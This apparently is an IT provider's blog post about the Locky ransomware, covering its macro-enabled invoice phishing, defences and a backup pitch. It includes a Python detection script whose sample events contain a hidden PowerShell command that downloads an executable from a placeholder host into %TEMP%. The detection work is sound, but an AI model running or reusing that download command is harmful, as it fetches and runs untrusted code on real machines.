Have You Opened Any Invoice Attachments Lately?
Just this past week, a new ransomware strain called Locky was discovered, and it has security experts more than a little concerned. Many IT service providers report that it is spreading at an alarming rate and is getting past antivirus, spam-filtering and web-filtering solutions. So if you regularly (or ever) need to open attachments such as Word documents or invoices, you will want to read this.
Security researchers estimate that Locky is achieving approximately 4,000 new infections per hour, or around 100,000 per day. Statistically, that means you could very well be a target. Locky behaves much like the CryptoWall virus: it not only encrypts your files but also renames them, which makes it very difficult to work out which encrypted file corresponds to which original, and at the time of writing there is no known way to decrypt files that Locky has encrypted. Make no mistake, this is far from your average easy-to-detect-and-remove ransomware. Locky means business.
What is Locky?
Aside from being far more than a minor nuisance, Locky is a new strain of ransomware that relies on two forms of social engineering to get installed (a phishing email and a document that talks the user into enabling macros) and then encrypts:
- Files on the infected computer
- Network shares, including unmapped network shares
Much like its heavy-hitting ransomware predecessors, it relies on email phishing to get installed, and so far experts report that the attackers are duping victims into downloading malicious attachments disguised as invoices. Security experts have been warning people to be cautious of emails with subjects similar to "ATTN: Invoice J-235434".
How does Locky work?
Now, it's not exactly a state secret that hackers often use social engineering to convince targets that they are trustworthy, reaching out to them either online or over the phone. Fortunately, for now, Locky needs the targeted person to cooperate in order to launch successfully. However, after examining the sophistication of the text in the body of the Locky email, it is easy to see how attackers are able to trick users into opening these attachments.
The attack doesn't end with a deceptive subject line, however. Locky has another security layer to get past, and how it manages this is deviously clever.
Once the attached document (the supposed invoice) has been opened, its text appears illegible or scrambled, and the document prompts you to enable macros so that it displays correctly. That prompt is the second piece of social engineering: if you enable macros, the macro downloads an executable from a remote server, stores it in the %Temp% folder and runs it. That executable is the Locky ransomware, which, once started, begins encrypting the files on your computer and on the network.
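The chain just described (an Office application, acting on a macro, running an executable that was dropped in %Temp%) is something process-creation telemetry can catch even when the attachment itself slipped past the mail filter. The script below is an added example, not code from the original post or from Hammett Technologies: it runs a simple detection over constructed process-creation records whose field names mirror Sysmon Event ID 1 (Image, ParentImage, CommandLine). The record layout, file names and paths are all made up for illustration. It also goes slightly beyond the post by flagging an Office app spawning a script host such as PowerShell, a common way for a macro to fetch a payload, which the post does not attribute to Locky specifically.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Office applications whose child processes deserve scrutiny.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# User and system temp folders: the post says the macro drops its payload in %Temp%.
TEMP_DIR_RE = re.compile(r"\\appdata\\local\\temp\\|\\windows\\temp\\", re.IGNORECASE)

# Interpreters a macro commonly uses to download and run a payload. This is a
# generalisation for the example, not something the post states about Locky.
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass(frozen=True)
class ProcessCreate:
    image: str          # full path of the newly created process
    parent_image: str   # full path of the process that spawned it
    command_line: str


def parse_event(line: str) -> ProcessCreate:
    """Parse one 'Key: value | Key: value' record.

    The text layout is constructed for this example; a real Sysmon or EDR feed
    would be parsed from XML or JSON, but the field names are Sysmon's.
    """
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition(":")   # split on the first colon only,
        fields[key.strip()] = value.strip()   # so drive letters survive intact
    return ProcessCreate(
        image=fields["Image"],
        parent_image=fields["ParentImage"],
        command_line=fields.get("CommandLine", ""),
    )


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessCreate) -> str:
    """Return a reason string if the event matches a macro-dropper pattern, else ''."""
    if basename(ev.parent_image) not in OFFICE_APPS:
        return ""                               # only Office parents are of interest
    if TEMP_DIR_RE.search(ev.image):
        return "office-app-spawned-executable-from-temp"
    if basename(ev.image) in SCRIPT_HOSTS:
        return "office-app-spawned-script-host"
    return ""


def find_alerts(lines: List[str]) -> List[Tuple[ProcessCreate, str]]:
    """Run classify() over every record and keep the ones that fire."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        reason = classify(ev)
        if reason:
            alerts.append((ev, reason))
    return alerts


# Constructed sample events (not real telemetry); paths and names are illustrative.
SAMPLE_EVENTS = [
    # Benign: Word launching the print-spooler helper from the Windows folder.
    r"Image: C:\Windows\splwow64.exe | ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | CommandLine: splwow64.exe 8192",
    # Benign for this rule: a user running an installer from Temp via Explorer (parent is not Office).
    r"Image: C:\Users\alice\AppData\Local\Temp\setup.exe | ParentImage: C:\Windows\explorer.exe | CommandLine: setup.exe",
    # The chain in the post: Word (via the macro) running an executable dropped in %Temp%.
    r"Image: C:\Users\alice\AppData\Local\Temp\invoice_payload.exe | ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | CommandLine: invoice_payload.exe",
    # Generalisation: Excel spawning PowerShell to download something.
    r"Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | CommandLine: powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/p.exe','%TEMP%\p.exe')",
]

if __name__ == "__main__":
    for ev, reason in find_alerts(SAMPLE_EVENTS):
        print(f"ALERT {reason}: {ev.parent_image} -> {ev.image}")
```

Run as-is, the script reports two of the four constructed events: the Word-to-%Temp% executable that matches the post's description, and the Excel-to-PowerShell launch. The two benign records pass because either the parent is not an Office application or the child is a normal Office helper outside the temp folders; in a real deployment you would tune OFFICE_APPS and the path pattern to your environment and feed the function from your endpoint telemetry rather than from an inline list.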
How to protect yourself
I'm sure that disabling macros across your entire company has come to mind right about now. But this isn't always a feasible option, since your workforce more than likely depends on legacy documents and spreadsheets that rely heavily on macros. A middle ground is to tighten the setting rather than switch it off entirely: Office's Trust Center can be set to run only digitally signed macros from trusted publishers, and a document opened straight from an email stays in Protected View, where its macros cannot run until the user actively chooses to leave it.
Whatever you do about macros, you will want weapons-grade backup/restore functionality behind it. Bear in mind that Locky encrypts network shares, including unmapped ones, so a backup that sits on a share the infected PC can write to is itself at risk; what lets you recover is a copy the ransomware cannot reach. Hammett Technologies offers secure backups that store and protect your data against ransomware attacks such as this, so whatever malicious attack you face, your data remains safe and accessible. You can read more about Hammett Technologies' comprehensive Cloud Backup here: http://hammett.wpengine.com/cloud-based-backup/ .
Hammett Technologies offers comprehensive security and IT solution services that can safeguard your organization from a variety of malicious and targeted attacks. Contact us today at (443) 216-9999 or send us an email at firstname.lastname@example.org for a free, no-obligation consultation about our security and Cloud backup offerings.